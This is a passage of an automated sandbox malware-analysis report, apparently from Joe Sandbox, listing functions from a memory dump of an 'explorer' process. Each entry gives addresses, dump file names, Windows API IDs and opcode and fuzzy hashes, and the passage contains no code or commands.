                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: 88dffc6a1b81ce04bfca87e42085a62a92b242d294944086ba8cc77f43fc57f9
                          • Instruction ID: e1b6051efc59c98422b96c11b2e7687c94bc93bee058432875acc13da0e745a8
                          • Opcode Fuzzy Hash: 88dffc6a1b81ce04bfca87e42085a62a92b242d294944086ba8cc77f43fc57f9
                          • Instruction Fuzzy Hash: 12017F78208A1082FB5DAB65F8583E82B60EB80719F51013AE75A826B0CF7E95CBD201
                          Function 011AD0A3 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: 071ec3ee98c63fbac2543c53b144c79b050ce75277ae2af07826768c390415da
                          • Instruction ID: e1b6051efc59c98422b96c11b2e7687c94bc93bee058432875acc13da0e745a8
                          • Opcode Fuzzy Hash: 071ec3ee98c63fbac2543c53b144c79b050ce75277ae2af07826768c390415da
                          • Instruction Fuzzy Hash: 12017F78208A1082FB5DAB65F8583E82B60EB80719F51013AE75A826B0CF7E95CBD201
                          Function 011AD0CE Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$FreeLocal
                          • String ID:
                          • API String ID: 2513001865-0
                          • Opcode ID: fe83e434bb21f8b47625b133ee357315dbef1f0c2e12580fe1cd2892aaf91b30
                          • Instruction ID: e1b6051efc59c98422b96c11b2e7687c94bc93bee058432875acc13da0e745a8
                          • Opcode Fuzzy Hash: fe83e434bb21f8b47625b133ee357315dbef1f0c2e12580fe1cd2892aaf91b30
                          • Instruction Fuzzy Hash: 12017F78208A1082FB5DAB65F8583E82B60EB80719F51013AE75A826B0CF7E95CBD201
                          Function 01195938 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: cad900d789a40a9619eb8a84c31abfdaddefd0efb2762fffc6044bd3b6a371bc
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: cad900d789a40a9619eb8a84c31abfdaddefd0efb2762fffc6044bd3b6a371bc
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 01195959 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 6290d7383921826c2fb2153af05a94dd3d68b95febe418c75b29594f5142ad3d
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 6290d7383921826c2fb2153af05a94dd3d68b95febe418c75b29594f5142ad3d
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 01195976 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 7b6153c6be145777827cd8c3fb034296d5dca575c3959cca0c07ce944510a9db
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 7b6153c6be145777827cd8c3fb034296d5dca575c3959cca0c07ce944510a9db
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 011959A3 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: af4a35e4e4abec3209dc8fb34bcfc3cca6138c75e85fc8755ee537a112a803e6
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: af4a35e4e4abec3209dc8fb34bcfc3cca6138c75e85fc8755ee537a112a803e6
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 01195840 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 6fcbe49abc170e1c91c6467c457cb6c13931c4070732e08da6ef8548becb2af1
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 6fcbe49abc170e1c91c6467c457cb6c13931c4070732e08da6ef8548becb2af1
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 011958D9 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 40ee07639c3be5b75497e6e884ebfb5705d9c6f6f58fa0c4bf9a654f76376cd9
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 40ee07639c3be5b75497e6e884ebfb5705d9c6f6f58fa0c4bf9a654f76376cd9
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 011953E3 Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: cc0291f771db6060459dd180bd0b9c9a08b45fa3966b5cc9664607b08890a75d
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: cc0291f771db6060459dd180bd0b9c9a08b45fa3966b5cc9664607b08890a75d
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 0119579E Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 58d95034212d87b3fa1662d6023566bd8a85bc94c35c32b1f9a0b6e391890324
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 58d95034212d87b3fa1662d6023566bd8a85bc94c35c32b1f9a0b6e391890324
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 0119569A Relevance: 5.0, APIs: 4, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHandleLocal
                          • String ID:
                          • API String ID: 836400252-0
                          • Opcode ID: 5c06d81188742bad334a714b0b921bf5e4e99c4f22570477523bf823b0ebdd76
                          • Instruction ID: c2dbda10c42054e7a2984db37f2c2d75f12a05b0cb50b8294aa717a78882ed36
                          • Opcode Fuzzy Hash: 5c06d81188742bad334a714b0b921bf5e4e99c4f22570477523bf823b0ebdd76
                          • Instruction Fuzzy Hash: 02F09E31118A4481FB5DBB64F8D83D56762F780B59F44113AA766955F4CFBCC4CACB04
                          Function 011AB1FB Relevance: 5.0, APIs: 4, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$CloseHandle
                          • String ID:
                          • API String ID: 2045616094-0
                          • Opcode ID: c5846185c44490f6f6e74aef4564aac99db16b98675db52f260037c00af0082f
                          • Instruction ID: 241c720d9b9d658cb4cfe388411289cbf83877093b198c5aeb112465374cd0cb
                          • Opcode Fuzzy Hash: c5846185c44490f6f6e74aef4564aac99db16b98675db52f260037c00af0082f
                          • Instruction Fuzzy Hash: C9F06775218BC4C2DA29AF21F8943DD6721F7C8B95F404526DA5E43728CE28D489CB41